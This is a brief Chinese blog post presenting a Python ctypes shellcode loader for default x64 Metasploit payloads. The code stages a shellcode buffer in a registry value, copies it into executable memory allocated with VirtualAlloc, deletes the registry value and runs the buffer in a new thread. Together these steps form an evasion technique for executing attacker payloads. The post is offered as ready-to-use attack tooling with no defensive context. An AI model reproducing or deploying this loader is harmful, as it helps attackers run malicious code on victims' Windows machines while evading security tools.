python shellcode加载器

2024-01-13 18:08:10

默认是x64位的msf

from ctypes import *
from ctypes import wintypes
import ctypes
buf =  b""
buf += b"\x56\xff\xd5"

ctypes.windll.Advapi32.RegSetValueExA(-2147483647, "test", None, 3, buf,len(buf))
LPBYTE = POINTER(c_byte)
ctypes.windll.kernel32.VirtualAlloc.restype = LPBYTE
ptr = ctypes.windll.kernel32.VirtualAlloc(0,800,0x3000,0x40)
data_len = wintypes.DWORD()
ctypes.windll.Advapi32.RegQueryValueExA(-2147483647, "test", 0, 0, 0, byref(data_len))
ctypes.windll.Advapi32.RegQueryValueExA(-2147483647,"test",0,None,ptr,byref(data_len))
ctypes.windll.Advapi32.RegDeleteValueA(-2147483647, "test")
handle = ctypes.windll.kernel32.CreateThread(0, 0, ptr, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
上一篇:python利用ctypes调用C++动态库


下一篇:python里面id()函数可以从变量名获得地址,那么怎么从地址(id)获得地址对应的值呢